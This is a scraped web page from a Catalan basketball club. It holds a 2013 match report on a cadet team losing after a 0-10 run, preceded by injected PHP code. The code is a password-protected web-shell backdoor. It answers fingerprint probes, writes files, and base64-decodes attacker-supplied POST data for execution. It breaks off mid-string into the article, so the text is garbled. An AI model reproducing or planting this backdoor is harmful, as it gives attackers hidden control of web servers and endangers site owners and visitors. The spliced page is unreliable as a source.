function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un parcial de 0-10 ensorra les aspiracions del cadet masculí A - Tgn Bàsquet Club -

Un parcial de 0-10 ensorra les aspiracions del cadet masculí A

Updated: octubre 14, 2013

A diferencia de partits anteriors el cadet masculí A va sortir més concentrat en els primers minuts, mostra d’això els locals van agafar ràpidament un petit avantatge en el marcador. El partit estava molt obert, i els locals tot i que intentaven córrer amb criteri en atac, una sèrie d’errors puntuals feien que no controlessin el partit i que s’arribés amb igualtat al descans. L’inici de la segona meitat era esperançador pel TGN. L’equip lila va sortir amb intensitat i ràpidament va agafar un marge de 6 punts, però els visitants amb un parcial de 0-10 entre el final del tercer quart i inici del últim  es van situar per primer cop davant en el marcador. Va ser un cop dur pel nois de lila que es van trobar sense idees ofensives i descentrats en defensa, i només van poder veure com se’ls hi escapava la victòria de les mans.